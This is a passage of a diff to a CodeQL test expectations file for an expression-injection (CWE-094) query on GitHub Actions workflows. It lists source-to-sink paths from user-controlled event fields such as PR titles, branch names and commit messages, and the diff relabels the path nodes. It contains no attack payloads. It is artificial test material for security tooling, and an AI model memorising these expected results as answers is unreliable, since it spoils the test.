github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | steps.step.outputs.value | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | github.event.workflow_run.head_repository.description | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 1ea054565bc..cb924c97ea1 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -1,269 +1,269 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | +| 